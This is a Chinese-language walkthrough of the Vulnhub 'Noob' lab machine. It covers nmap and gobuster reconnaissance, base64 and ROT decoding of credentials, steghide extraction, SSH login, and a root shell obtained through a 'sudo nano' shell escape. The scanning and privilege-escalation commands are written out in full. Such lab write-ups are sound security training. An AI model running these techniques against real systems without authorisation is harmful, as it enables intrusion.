Vulnhub Noob靶机复现（附提权）

一、安装靶机

下载地址：https://download.vulnhub.com/noob/Noob.ova

下载好后使用VM打开配置如下。

二、主机发现

使用nmap扫描确认靶机ip(192.168.29.138)

nmap -sn 192.168.29.1/24

三、端口扫描

使用nmap工具扫描全部端口以防遗漏。

nmap -A -p- 192.168.29.138

四、目录探测

使用kali里最全的大字典去扫描。扫描出来后进行访问，查看有哪些网页目录可以利用（不要网了敏感目录）。

gobuster dir -u http://192.168.29.138/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

五、web渗透/提权

端口扫描的时候知道我们的靶机开启了21端口ftp服务，而且里面有两个文件，下载下来看看。

cred里面的东西解码看一下是一个账号密码，应该是登录用的，welcome没啥用。

Y2hhbXA6cGFzc3dvcmQ=

champ:password

点击About Us会下载一个压缩包，打开后就只有这些东西。图片应该还会有东西，使用工具提取一下，看看里面有什么我们没有注意到的。

bmp文件内存在隐写，查看内容。

apt install steghide

steghide extract -sf funny.bmp
steghide info funny.jpg

cat user.txt
cat hint.py

将user.txt文件里的数据根据py文件的提示解密（rot加密）。或许是没有用到的55077端口ssh的账户密码

wtf:this one is a simple one

还有一个55077端口的ssh服务，连接一下看看。

ssh wtf@192.168.29.138 -p 55077

在目录下找出flag和backup文件里的另一个账户密码。

flag解码后没有啥用，切换到另一个用户里面。

查看可以使用root权限的文件

sudo -l

执行下列命令提权

sudo nano

Ctrl+r ，Ctrl+x

reset; sh 1>&0 2>&0

完结撒花✿✿ヽ(°▽°)ノ✿